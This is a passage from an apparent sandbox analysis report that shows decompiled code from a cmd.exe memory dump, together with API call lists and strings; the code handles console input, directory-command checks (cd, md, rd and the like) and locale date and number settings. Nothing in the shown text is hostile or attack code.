																		_t169 = _t169 + 4;
																		__eflags = _t182;
																		if(_t182 != 0) {
																			continue;
																		} else {
																			goto L32;
																		}
																	}
																}
																L34:
																_v96 = _t170;
																__eflags = _t134;
																if(_t134 != 0) {
																	goto L35;
																}
																goto L36;
															}
															asm("sbb eax, eax");
															_t134 = _t133 | 0x00000001;
															_t170 = 0;
															__eflags = 0;
															goto L34;
														}
														L36:
														_t99 = _v80;
														__eflags = _t99;
														if(__eflags == 0) {
															__eflags = _v92 - 2;
															if(__eflags > 0) {
																__imp___wcsnicmp(_t184, L"cd ", 3);
																_t193 = _t193 + 0xc;
																__eflags = _t99;
																if(__eflags == 0) {
																	L45:
																	_t99 = 1;
																} else {
																	__imp___wcsnicmp(_t184, L"rd ", 3);
																	_t193 = _t193 + 0xc;
																	__eflags = _t99;
																	if(__eflags == 0) {
																		goto L45;
																	} else {
																		__imp___wcsnicmp(_t184, L"md ", 3);
																		_t193 = _t193 + 0xc;
																		__eflags = _t99;
																		if(__eflags == 0) {
																			goto L45;
																		} else {
																			__imp___wcsnicmp(_t184, L"chdir ", 6);
																			_t193 = _t193 + 0xc;
																			__eflags = _t99;
																			if(__eflags == 0) {
																				goto L45;
																			} else {
																				__imp___wcsnicmp(_t184, L"rmdir ", 6);
																				_t193 = _t193 + 0xc;
																				__eflags = _t99;
																				if(__eflags == 0) {
																					goto L45;
																				} else {
																					__imp___wcsnicmp(_t184, L"mkdir ", 6);
																					_t193 = _t193 + 0xc;
																					__eflags = _t99;
																					if(__eflags == 0) {
																						goto L45;
																					} else {
																						__imp___wcsnicmp(_t184, L"pushd ", 6);
																						_t193 = _t193 + 0xc;
																						__eflags = _t99;
																						if(__eflags != 0) {
																							_t99 = _v80;
																						} else {
																							goto L45;
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
														_push(_v96);
														_t155 = _t184;
														_push(_t99);
														_push( !(_v44 >> 4) & 0x00000001);
														_push(_v92);
														_t104 = E001DB2BF(_t142, _t184, _a4, _t184, _t190, __eflags);
														__eflags = _t104;
														if(_t104 == 0) {
															_t105 = E001C7797(_t155);
															__eflags = _t105;
															if(_t105 != 0) {
																 *0x1fc014(0xffffffff);
															}
															_t156 = _t184;
															_t73 = _t156 + 2; // 0xc
															_t177 = _t73;
															do {
																_t106 =  *_t156;
																_t156 = _t156 + 2;
																__eflags = _t106 - _v80;
															} while (_t106 != _v80);
															_t157 = _t156 - _t177;
															__eflags = _t157;
															_v68 = _t157 >> 1;
														} else {
															E001D9897();
															_t118 = GetConsoleScreenBufferInfo(_v100,  &_v56);
															__eflags = _t118;
															if(_t118 != 0) {
																_t168 = _v50 - (_v92 + _v108) / _v56;
																__eflags = _t168;
																_v90 = _t168;
																_t190 = _v92;
															}
															_t163 = _t184;
															_t61 = _t163 + 2; // 0xc
															_t178 = _t61;
															do {
																_t119 =  *_t163;
																_t163 = _t163 + 2;
																__eflags = _t119 - _v80;
															} while (_t119 != _v80);
															_v88 = _t163 - _t178 >> 1;
															SetConsoleCursorPosition(_v100, _t190);
															_push( &_v84);
															_push(_t190);
															_push(_v84);
															_push(0x20);
															_push(_v100);
															FillConsoleOutputCharacterW();
															WriteConsoleW(_v120, _t184, _v108,  &_v108, 0);
															_v88 = _v108;
															E001C06C0(_t163 - _t178 >> 1);
														}
														__eflags = _t142;
														if(_t142 == 0) {
															_t143 = 0;
															__eflags = 0;
														} else {
															_t143 = 0;
															RtlFreeHeap(GetProcessHeap(), 0, _t142);
														}
														_t159 = _t184;
														_t76 = _t159 + 2; // 0xc
														_t173 = _t76;
														do {
															_t107 =  *_t159;
															_t159 = _t159 + 2;
															__eflags = _t107 - _t143;
														} while (_t107 != _t143);
														_t77 = (_t159 - _t173 >> 1) + 1; // 0x9
														_t108 = _t77;
														_v112 = _t108;
														_t142 = HeapAlloc(GetProcessHeap(), _t143, _t108 + _t108);
														__eflags = _t142;
														if(_t142 == 0) {
															_t87 = 0;
														} else {
															_t173 = _v112;
															E001C1040(_t142, _t173, _t184);
															goto L7;
														}
													}
												}
											} else {
												_t95 = _t95 + 1;
												if(_t95 <  *_v88) {
													continue;
												} else {
													goto L18;
												}
											}
										}
										goto L67;
									}
									_t173 = _t95;
									_t95 = _v92;
									goto L24;
								}
								goto L67;
							}
							L18:
							if(_t142 != 0) {
								RtlFreeHeap(GetProcessHeap(), 0, _t142);
							}
							_t87 = _v96;
						}
					}
				}
				L67:
				_pop(_t185);
				_pop(_t189);
				_pop(_t141);
				return E001C6FD0(_t87, _t141, _v16 ^ _t193, _t173, _t185, _t189);
			}

0x001d3506
0x001d350e
0x001d3511
0x001d3518
0x001d351e
0x001d3524
0x001d3526
0x001d352a
0x001d352e
0x001d3534
0x001d353b
0x001d353f
0x001d3546
0x001d3546
0x001d3551
0x001d3932
0x001d3938
0x001d3949
0x001d3952
0x001d3958
0x001d3557
0x001d3559
0x001d355a
0x001d3561
0x00000000
0x001d3567
0x001d3567
0x001d356e
0x00000000
0x001d3588
0x001d3588
0x001d3598
0x001d359c
0x001d359e
0x001d35a0
0x001d35a3
0x001d35a7
0x001d35af
0x001d35b3
0x001d35b7
0x001d35bb
0x001d35bf
0x001d35c4
0x001d35ca
0x001d35d0
0x001d35d6
0x001d35dc
0x001d35dc
0x001d35e1
0x001d35f8
0x001d3603
0x001d3607
0x001d361a
0x001d361e
0x001d365a
0x001d365a
0x001d3620
0x001d3626
0x001d3634
0x001d3639
0x001d3641
0x001d364e
0x001d364e
0x001d3654
0x001d3656
0x001d3656
0x001d3661
0x00000000
0x00000000
0x001d3667
0x001d366a
0x001d366f
0x001d3676
0x00000000
0x001d3678
0x001d3678
0x001d3678
0x001d367f
0x00000000
0x00000000
0x001d3681
0x001d3688
0x001d36c8
0x00000000
0x001d368a
0x001d368a
0x001d3691
0x001d36ba
0x001d36be
0x001d36d4
0x001d36d4
0x001d36d7
0x00000000
0x001d36d9
0x001d36d9
0x001d36d9
0x001d36dc
0x00000000
0x001d36de
0x001d36e2
0x001d36e6
0x001d36ea
0x001d36ec
0x001d3729
0x001d3729
0x001d36ee
0x001d36ee
0x001d36f0
0x001d36f2
0x001d36f2
0x001d36f5
0x001d36f8
0x00000000
0x00000000
0x001d36fa
0x001d36fd
0x001d3714
0x001d3714
0x001d3716
0x001d36ff
0x001d36ff
0x001d3703
0x001d3707
0x00000000
0x001d3709
0x001d3709
0x001d370c
0x001d370f
0x001d3712
0x00000000
0x00000000
0x00000000
0x00000000
0x001d3712
0x001d3707
0x001d3721
0x001d3721
0x001d3725
0x001d3727
0x00000000
0x00000000
0x00000000
0x001d3727
0x001d371a
0x001d371c
0x001d371f
0x001d371f
0x00000000
0x001d371f
0x001d3731
0x001d3731
0x001d3735
0x001d3737
0x001d373d
0x001d3742
0x001d3750
0x001d3756
0x001d3759
0x001d375b
0x001d37db
0x001d37dd
0x001d375d
0x001d3765
0x001d376b
0x001d376e
0x001d3770
0x00000000
0x001d3772
0x001d377a
0x001d3780
0x001d3783
0x001d3785
0x00000000
0x001d3787
0x001d378f
0x001d3795
0x001d3798
0x001d379a
0x00000000
0x001d379c
0x001d37a4
0x001d37aa
0x001d37ad
0x001d37af
0x00000000
0x001d37b1
0x001d37b9
0x001d37bf
0x001d37c2
0x001d37c4
0x00000000
0x001d37c6
0x001d37ce
0x001d37d4
0x001d37d7
0x001d37d9
0x001d37e0
0x00000000
0x00000000
0x00000000
0x001d37d9
0x001d37c4
0x001d37af
0x001d379a
0x001d3785
0x001d3770
0x001d375b
0x001d3742
0x001d37e4
0x001d37eb
0x001d37ed
0x001d37fa
0x001d37fb
0x001d37ff
0x001d3804
0x001d3806
0x001d38a7
0x001d38ac
0x001d38ae
0x001d38b2
0x001d38b2
0x001d38b8
0x001d38ba
0x001d38ba
0x001d38bd
0x001d38bd
0x001d38c0
0x001d38c3
0x001d38c3
0x001d38ca
0x001d38ca
0x001d38ce
0x001d380c
0x001d380c
0x001d381a
0x001d3820
0x001d3822
0x001d383b
0x001d383b
0x001d383d
0x001d3842
0x001d3842
0x001d3846
0x001d3848
0x001d3848
0x001d384b
0x001d384b
0x001d384e
0x001d3851
0x001d3851
0x001d3861
0x001d3865
0x001d386f
0x001d3870
0x001d3871
0x001d3875
0x001d3877
0x001d387b
0x001d3892
0x001d389c
0x001d38a0
0x001d38a0
0x001d38d2
0x001d38d4
0x001d38e9
0x001d38e9
0x001d38d6
0x001d38d7
0x001d38e1
0x001d38e1
0x001d38eb
0x001d38ed
0x001d38ed
0x001d38f0
0x001d38f0
0x001d38f3
0x001d38f6
0x001d38f6
0x001d38ff
0x001d38ff
0x001d3902
0x001d3917
0x001d3919
0x001d391b
0x001d392e
0x001d391d
0x001d391d
0x001d3924
0x00000000
0x001d3924
0x001d391b
0x001d36dc
0x001d3693
0x001d3697
0x001d369a
0x00000000
0x00000000
0x00000000
0x00000000
0x001d369a
0x001d3691
0x00000000
0x001d3688
0x001d36ce
0x001d36d0
0x00000000
0x001d36d0
0x00000000
0x001d3676
0x001d369c
0x001d369e
0x001d36ab
0x001d36ab
0x001d36b1
0x001d36b1
0x001d356e
0x001d3561
0x001d395a
0x001d395e
0x001d395f
0x001d3960
0x001d396b

APIs

GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,0000000A,00000000,00000001), ref: 001D352E
_get_osfhandle.MSVCRT ref: 001D353F
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 001D357A
AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001F7F20), ref: 001D35E1
ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,0000000A,?,?,00000010), ref: 001D35F8
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001F7F20), ref: 001D3607
EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 001D3626
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 001D3639
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 001D3647
RtlFreeHeap.NTDLL(00000000), ref: 001D364E
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 001D36A4
RtlFreeHeap.NTDLL(00000000), ref: 001D36AB
_wcsnicmp.MSVCRT ref: 001D3750
_wcsnicmp.MSVCRT ref: 001D3765
_wcsnicmp.MSVCRT ref: 001D377A
_wcsnicmp.MSVCRT ref: 001D378F
_wcsnicmp.MSVCRT ref: 001D37A4
_wcsnicmp.MSVCRT ref: 001D37B9
_wcsnicmp.MSVCRT ref: 001D37CE
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,00000001,?), ref: 001D381A
SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?), ref: 001D3865
FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,00000020,?,?,?), ref: 001D387B
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,0000000A,?,?,00000000), ref: 001D3892
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 001D38DA
RtlFreeHeap.NTDLL(00000000), ref: 001D38E1
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000009,?,?,?,00000001), ref: 001D390A
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 001D3911
AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001F7F20), ref: 001D3938
ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,0000000A,?,?,00000000), ref: 001D3949
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001F7F20), ref: 001D3952

Strings

mkdir , xrefs: 001D37B3
rmdir , xrefs: 001D379E
rd , xrefs: 001D375F
cd , xrefs: 001D374A
chdir , xrefs: 001D3789
md , xrefs: 001D3774
pushd , xrefs: 001D37C8

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferCriticalInfoReadReleaseScreenSection$AllocCharacterCursorEnterFillHandleLeaveOutputPositionWrite_get_osfhandle
String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
API String ID: 2991647268-3100821235
Opcode ID: f458ecd8689a6b67f8c5ac4969edffa47d77ecc62c74e9129a3db82f7255a704
Instruction ID: cad1a191a1ae3554487ab7e34a84117e7ea9d9dcd4bfb276ee8b68b5613d9947
Opcode Fuzzy Hash: f458ecd8689a6b67f8c5ac4969edffa47d77ecc62c74e9129a3db82f7255a704
Instruction Fuzzy Hash: 86C1B1B1604301AFC714AF64EC88A7A7BE5FF88314F04492EF966D67A0D771DA81CB12

Uniqueness

Uniqueness Score: -1.00%

Function 001C3F80 Relevance: 47.6, APIs: 15, Strings: 12, Instructions: 395
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E001C3F80() {
				signed int _v8;
				short _v264;
				void* __edi;
				void* __esi;
				signed int _t33;
				signed int _t75;
				signed int _t76;
				signed int _t77;
				signed int _t78;
				signed int _t79;
				signed int _t80;
				signed int _t81;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				intOrPtr _t86;
				void* _t87;
				signed int _t89;
				signed int _t90;
				signed int _t91;
				void* _t92;
				short* _t93;
				short* _t94;
				short* _t95;
				short* _t96;
				short* _t97;
				short* _t98;
				short* _t99;
				short* _t100;
				short* _t101;
				short* _t102;
				short* _t103;
				intOrPtr* _t106;
				int _t107;
				int _t108;
				int _t109;
				int _t110;
				int _t111;
				int _t112;
				int _t113;
				int _t114;
				int _t115;
				int _t116;
				void* _t118;
				void* _t120;
				void* _t122;
				void* _t124;
				void* _t126;
				void* _t128;
				void* _t130;
				void* _t132;
				void* _t134;
				int _t136;
				signed int _t138;

				_t33 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t33 ^ _t138;
				_t136 = E001C41A4();
				if(GetLocaleInfoW(_t136, 0x1e, 0x1df81c, 8) == 0) {
					_t93 = 0x1df81c;
					_t107 = 8;
					_t118 = ":" - 0x1df81c;
					while(1) {
						_t11 = _t107 + 0x7ffffff6; // 0x7ffffffe
						if(_t11 == 0) {
							break;
						}
						_t91 =  *(_t118 + _t93) & 0x0000ffff;
						if(_t91 == 0) {
							break;
						}
						 *_t93 = _t91;
						_t93 =  &(_t93[1]);
						_t107 = _t107 - 1;
						if(_t107 != 0) {
							continue;
						}
						L33:
						_t93 = _t93 - 2;
						L34:
						 *_t93 = 0;
						goto L1;
					}
					if(_t107 != 0) {
						goto L34;
					}
					goto L33;
				}
				L1:
				if(GetLocaleInfoW(_t136, 0x23,  &_v264, 0x80) == 0) {
					L9:
					 *0x1dd540 = 0;
					if(GetLocaleInfoW(_t136, 0x21,  &_v264, 0x80) != 0) {
						_t86 = (_v264 & 0x0000ffff) - 0x30;
						if(_t86 != 0) {
							_t87 = _t86 - 1;
							if(_t87 == 0) {
								 *0x1dd540 = 1;
								 *0x1df7f8 = L"dd/MM/yy";
							} else {
								if(_t87 == 1) {
									 *0x1dd540 = 2;
									 *0x1df7f8 = L"yy/MM/dd";
								}
							}
						} else {
							 *0x1dd540 = _t86;
							 *0x1df7f8 = L"MM/dd/yy";
						}
					}
					 *0x1df620 = 2;
					if(GetLocaleInfoW(_t136, 0x24,  &_v264, 0x80) != 0 && _v264 == 0x31) {
						 *0x1df620 = 4;
					}
					if(GetLocaleInfoW(_t136, 0x1d, 0x1df80c, 8) == 0) {
						_t94 = 0x1df80c;
						_t108 = 8;
						_t120 = "/" - 0x1df80c;
						while(1) {
							_t13 = _t108 + 0x7ffffff6; // 0x7ffffffe
							if(_t13 == 0) {
								break;
							}
							_t84 =  *(_t120 + _t94) & 0x0000ffff;
							if(_t84 == 0) {
								break;
							}
							 *_t94 = _t84;
							_t94 =  &(_t94[1]);
							_t108 = _t108 - 1;
							if(_t108 != 0) {
								continue;
							}
							L45:
							_t94 = _t94 - 2;
							L46:
							 *_t94 = 0;
							goto L16;
						}
						if(_t108 != 0) {
							goto L46;
						}
						goto L45;
					} else {
						L16:
						if(GetLocaleInfoW(_t136, 0x31, 0x1df7a8, 0x20) == 0) {
							_t95 = 0x1df7a8;
							_t109 = 0x20;
							_t122 = L"Mon" - 0x1df7a8;
							while(1) {
								_t15 = _t109 + 0x7fffffde; // 0x7ffffffe
								if(_t15 == 0) {
									break;
								}
								_t83 =  *(_t122 + _t95) & 0x0000ffff;
								if(_t83 == 0) {
									break;
								}
								 *_t95 = _t83;
								_t95 =  &(_t95[1]);
								_t109 = _t109 - 1;
								if(_t109 != 0) {
									continue;
								}
								L53:
								_t95 = _t95 - 2;
								L54:
								 *_t95 = 0;
								goto L17;
							}
							if(_t109 != 0) {
								goto L54;
							}
							goto L53;
						}
						L17:
						if(GetLocaleInfoW(_t136, 0x32, 0x1df768, 0x20) == 0) {
							_t96 = 0x1df768;
							_t110 = 0x20;
							_t124 = L"Tue" - 0x1df768;
							while(1) {
								_t17 = _t110 + 0x7fffffde; // 0x7ffffffe
								if(_t17 == 0) {
									break;
								}
								_t82 =  *(_t124 + _t96) & 0x0000ffff;
								if(_t82 == 0) {
									break;
								}
								 *_t96 = _t82;
								_t96 =  &(_t96[1]);
								_t110 = _t110 - 1;
								if(_t110 != 0) {
									continue;
								}
								L61:
								_t96 = _t96 - 2;
								L62:
								 *_t96 = 0;
								goto L18;
							}
							if(_t110 != 0) {
								goto L62;
							}
							goto L61;
						}
						L18:
						if(GetLocaleInfoW(_t136, 0x33, 0x1df728, 0x20) == 0) {
							_t97 = 0x1df728;
							_t111 = 0x20;
							_t126 = L"Wed" - 0x1df728;
							while(1) {
								_t19 = _t111 + 0x7fffffde; // 0x7ffffffe
								if(_t19 == 0) {
									break;
								}
								_t81 =  *(_t126 + _t97) & 0x0000ffff;
								if(_t81 == 0) {
									break;
								}
								 *_t97 = _t81;
								_t97 =  &(_t97[1]);
								_t111 = _t111 - 1;
								if(_t111 != 0) {
									continue;
								}
								L69:
								_t97 = _t97 - 2;
								L70:
								 *_t97 = 0;
								goto L19;
							}
							if(_t111 != 0) {
								goto L70;
							}
							goto L69;
						}
						L19:
						if(GetLocaleInfoW(_t136, 0x34, 0x1df6e8, 0x20) == 0) {
							_t98 = 0x1df6e8;
							_t112 = 0x20;
							_t128 = L"Thu" - 0x1df6e8;
							while(1) {
								_t21 = _t112 + 0x7fffffde; // 0x7ffffffe
								if(_t21 == 0) {
									break;
								}
								_t80 =  *(_t128 + _t98) & 0x0000ffff;
								if(_t80 == 0) {
									break;
								}
								 *_t98 = _t80;
								_t98 =  &(_t98[1]);
								_t112 = _t112 - 1;
								if(_t112 != 0) {
									continue;
								}
								L77:
								_t98 = _t98 - 2;
								L78:
								 *_t98 = 0;
								goto L20;
							}
							if(_t112 != 0) {
								goto L78;
							}
							goto L77;
						}
						L20:
						if(GetLocaleInfoW(_t136, 0x35, 0x1df6a8, 0x20) == 0) {
							_t99 = 0x1df6a8;
							_t113 = 0x20;
							_t130 = L"Fri" - 0x1df6a8;
							while(1) {
								_t23 = _t113 + 0x7fffffde; // 0x7ffffffe
								if(_t23 == 0) {
									break;
								}
								_t79 =  *(_t130 + _t99) & 0x0000ffff;
								if(_t79 == 0) {
									break;
								}
								 *_t99 = _t79;
								_t99 =  &(_t99[1]);
								_t113 = _t113 - 1;
								if(_t113 != 0) {
									continue;
								}
								L85:
								_t99 = _t99 - 2;
								L86:
								 *_t99 = 0;
								goto L21;
							}
							if(_t113 != 0) {
								goto L86;
							}
							goto L85;
						}
						L21:
						if(GetLocaleInfoW(_t136, 0x36, 0x1df668, 0x20) == 0) {
							_t100 = 0x1df668;
							_t114 = 0x20;
							_t132 = L"Sat" - 0x1df668;
							while(1) {
								_t25 = _t114 + 0x7fffffde; // 0x7ffffffe
								if(_t25 == 0) {
									break;
								}
								_t78 =  *(_t132 + _t100) & 0x0000ffff;
								if(_t78 == 0) {
									break;
								}
								 *_t100 = _t78;
								_t100 =  &(_t100[1]);
								_t114 = _t114 - 1;
								if(_t114 != 0) {
									continue;
								}
								L93:
								_t100 = _t100 - 2;
								L94:
								 *_t100 = 0;
								goto L22;
							}
							if(_t114 != 0) {
								goto L94;
							}
							goto L93;
						}
						L22:
						if(GetLocaleInfoW(_t136, 0x37, 0x1df628, 0x20) == 0) {
							_t101 = 0x1df628;
							_t115 = 0x20;
							_t134 = L"Sun" - 0x1df628;
							while(1) {
								_t27 = _t115 + 0x7fffffde; // 0x7ffffffe
								if(_t27 == 0) {
									break;
								}
								_t77 =  *(_t134 + _t101) & 0x0000ffff;
								if(_t77 == 0) {
									break;
								}
								 *_t101 = _t77;
								_t101 =  &(_t101[1]);
								_t115 = _t115 - 1;
								if(_t115 != 0) {
									continue;
								}
								L101:
								_t101 = _t101 - 2;
								L102:
								 *_t101 = 0;
								goto L23;
							}
							if(_t115 != 0) {
								goto L102;
							}
							goto L101;
						}
						L23:
						if(GetLocaleInfoW(_t136, 0xe, 0x1df7fc, 8) == 0) {
							_t102 = 0x1df7fc;
							_t116 = 8;
							_t134 = "." - 0x1df7fc;
							while(1) {
								_t29 = _t116 + 0x7ffffff6; // 0x7ffffffe
								if(_t29 == 0) {
									break;
								}
								_t76 =  *(_t134 + _t102) & 0x0000ffff;
								if(_t76 == 0) {
									break;
								}
								 *_t102 = _t76;
								_t102 =  &(_t102[1]);
								_t116 = _t116 - 1;
								if(_t116 != 0) {
									continue;
								}
								L109:
								_t102 = _t102 - 2;
								L110:
								 *_t102 = 0;
								goto L24;
							}
							if(_t116 != 0) {
								goto L110;
							}
							goto L109;
						}
						L24:
						if(GetLocaleInfoW(_t136, 0xf, 0x1df7e8, 8) == 0) {
							_t103 = 0x1df7e8;
							_t116 = 8;
							_t136 = "," - 0x1df7e8;
							while(1) {
								_t31 = _t116 + 0x7ffffff6; // 0x7ffffffe
								if(_t31 == 0) {
									break;
								}
								_t75 =  *(_t103 + _t136) & 0x0000ffff;
								if(_t75 == 0) {
									break;
								}
								 *_t103 = _t75;
								_t103 =  &(_t103[1]);
								_t116 = _t116 - 1;
								if(_t116 != 0) {
									continue;
								}
								L117:
								_t103 = _t103 - 2;
								L118:
								 *_t103 = 0;
								goto L25;
							}
							if(_t116 != 0) {
								goto L118;
							}
							goto L117;
						}
						L25:
						__imp__setlocale(".OCP");
						return E001C6FD0(0, _t92, _v8 ^ _t138, _t116, _t134, _t136, 0);
					}
				} else {
					_t89 = "1";
					_t106 =  &_v264;
					while(1) {
						_t116 =  *_t106;
						if(_t116 !=  *_t89) {
							break;
						}
						if(_t116 == 0) {
							L7:
							_t90 = 0;
							L8:
							 *0x1dd0cc = _t90;
							goto L9;
						}
						_t116 =  *((intOrPtr*)(_t106 + 2));
						_t5 = _t89 + 2; // 0x410000
						if(_t116 !=  *_t5) {
							break;
						}
						_t106 = _t106 + 4;
						_t89 = _t89 + 4;
						if(_t116 != 0) {
							continue;
						}
						goto L7;
					}
					asm("sbb eax, eax");
					_t90 = _t89 | 0x00000001;
					goto L8;
				}
			}

0x001c3f8b
0x001c3f92
0x001c3fa3
0x001c3fb0
0x001ce1fa
0x001ce204
0x001ce209
0x001ce20b
0x001ce20b
0x001ce213
0x00000000
0x00000000
0x001ce215
0x001ce21c
0x00000000
0x00000000
0x001ce21e
0x001ce221
0x001ce224
0x001ce227
0x00000000
0x00000000
0x001ce22f
0x001ce22f
0x001ce232
0x001ce234
0x00000000
0x001ce234
0x001ce22d
0x00000000
0x00000000
0x00000000
0x001ce22d
0x001c3fb6
0x001c3fcd
0x001c4011
0x001c401c
0x001c4032
0x001c403b
0x001c403e
0x001ce23c
0x001ce23f
0x001ce263
0x001ce26d
0x001ce241
0x001ce244
0x001ce24a
0x001ce254
0x001ce254
0x001ce244
0x001c4044
0x001c4044
0x001c4049
0x001c4049
0x001c403e
0x001c405e
0x001c4074
0x001c4080
0x001c4080
0x001c409c
0x001ce27c
0x001ce286
0x001ce28b
0x001ce28d
0x001ce28d
0x001ce295
0x00000000
0x00000000
0x001ce297
0x001ce29e
0x00000000
0x00000000
0x001ce2a0
0x001ce2a3
0x001ce2a6
0x001ce2a9
0x00000000
0x00000000
0x001ce2b1
0x001ce2b1
0x001ce2b4
0x001ce2b6
0x00000000
0x001ce2b6
0x001ce2af
0x00000000
0x00000000
0x00000000
0x001c40a2
0x001c40a2
0x001c40b4
0x001ce2be
0x001ce2c8
0x001ce2cd
0x001ce2cf
0x001ce2cf
0x001ce2d7
0x00000000
0x00000000
0x001ce2d9
0x001ce2e0
0x00000000
0x00000000
0x001ce2e2
0x001ce2e5
0x001ce2e8
0x001ce2eb
0x00000000
0x00000000
0x001ce2f3
0x001ce2f3
0x001ce2f6
0x001ce2f8
0x00000000
0x001ce2f8
0x001ce2f1
0x00000000
0x00000000
0x00000000
0x001ce2f1
0x001c40ba
0x001c40cc
0x001ce300
0x001ce30a
0x001ce30f
0x001ce311
0x001ce311
0x001ce319
0x00000000
0x00000000
0x001ce31b
0x001ce322
0x00000000
0x00000000
0x001ce324
0x001ce327
0x001ce32a
0x001ce32d
0x00000000
0x00000000
0x001ce335
0x001ce335
0x001ce338
0x001ce33a
0x00000000
0x001ce33a
0x001ce333
0x00000000
0x00000000
0x00000000
0x001ce333
0x001c40d2
0x001c40e4
0x001ce342
0x001ce34c
0x001ce351
0x001ce353
0x001ce353
0x001ce35b
0x00000000
0x00000000
0x001ce35d
0x001ce364
0x00000000
0x00000000
0x001ce366
0x001ce369
0x001ce36c
0x001ce36f
0x00000000
0x00000000
0x001ce377
0x001ce377
0x001ce37a
0x001ce37c
0x00000000
0x001ce37c
0x001ce375
0x00000000
0x00000000
0x00000000
0x001ce375
0x001c40ea
0x001c40fc
0x001ce384
0x001ce38e
0x001ce393
0x001ce395
0x001ce395
0x001ce39d
0x00000000
0x00000000
0x001ce39f
0x001ce3a6
0x00000000
0x00000000
0x001ce3a8
0x001ce3ab
0x001ce3ae
0x001ce3b1
0x00000000
0x00000000
0x001ce3b9
0x001ce3b9
0x001ce3bc
0x001ce3be
0x00000000
0x001ce3be
0x001ce3b7
0x00000000
0x00000000
0x00000000
0x001ce3b7
0x001c4102
0x001c4114
0x001ce3c6
0x001ce3d0
0x001ce3d5
0x001ce3d7
0x001ce3d7
0x001ce3df
0x00000000
0x00000000
0x001ce3e1
0x001ce3e8
0x00000000
0x00000000
0x001ce3ea
0x001ce3ed
0x001ce3f0
0x001ce3f3
0x00000000
0x00000000
0x001ce3fb
0x001ce3fb
0x001ce3fe
0x001ce400
0x00000000
0x001ce400
0x001ce3f9
0x00000000
0x00000000
0x00000000
0x001ce3f9
0x001c411a
0x001c412c
0x001ce408
0x001ce412
0x001ce417
0x001ce419
0x001ce419
0x001ce421
0x00000000
0x00000000
0x001ce423
0x001ce42a
0x00000000
0x00000000
0x001ce42c
0x001ce42f
0x001ce432
0x001ce435
0x00000000
0x00000000
0x001ce43d
0x001ce43d
0x001ce440
0x001ce442
0x00000000
0x001ce442
0x001ce43b
0x00000000
0x00000000
0x00000000
0x001ce43b
0x001c4132
0x001c4144
0x001ce44a
0x001ce454
0x001ce459
0x001ce45b
0x001ce45b
0x001ce463
0x00000000
0x00000000
0x001ce465
0x001ce46c
0x00000000
0x00000000
0x001ce46e
0x001ce471
0x001ce474
0x001ce477
0x00000000
0x00000000
0x001ce47f
0x001ce47f
0x001ce482
0x001ce484
0x00000000
0x001ce484
0x001ce47d
0x00000000
0x00000000
0x00000000
0x001ce47d
0x001c414a
0x001c415c
0x001ce48c
0x001ce496
0x001ce49b
0x001ce49d
0x001ce49d
0x001ce4a5
0x00000000
0x00000000
0x001ce4a7
0x001ce4ae
0x00000000
0x00000000
0x001ce4b0
0x001ce4b3
0x001ce4b6
0x001ce4b9
0x00000000
0x00000000
0x001ce4c1
0x001ce4c1
0x001ce4c4
0x001ce4c6
0x00000000
0x001ce4c6
0x001ce4bf
0x00000000
0x00000000
0x00000000
0x001ce4bf
0x001c4162
0x001c4174
0x001ce4ce
0x001ce4d8
0x001ce4dd
0x001ce4df
0x001ce4df
0x001ce4e7
0x00000000
0x00000000
0x001ce4e9
0x001ce4f0
0x00000000
0x00000000
0x001ce4f2
0x001ce4f5
0x001ce4f8
0x001ce4fb
0x00000000
0x00000000
0x001ce503
0x001ce503
0x001ce506
0x001ce508
0x00000000
0x001ce508
0x001ce501
0x00000000
0x00000000
0x00000000
0x001ce501
0x001c417a
0x001c4181
0x001c4199
0x001c4199
0x001c3fcf
0x001c3fcf
0x001c3fd4
0x001c3fe0
0x001c3fe0
0x001c3fe6
0x00000000
0x00000000
0x001c3fef
0x001c400a
0x001c400a
0x001c400c
0x001c400c
0x00000000
0x001c400c
0x001c3ff1
0x001c3ff5
0x001c3ff9
0x00000000
0x00000000
0x001c3fff
0x001c4002
0x001c4008
0x00000000
0x00000000
0x00000000
0x001c4008
0x001c419a
0x001c419c
0x00000000
0x001c419c

APIs

Part of subcall function 001C41A4: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(001B5BA1,0000001F,?,00000080), ref: 001C41A4

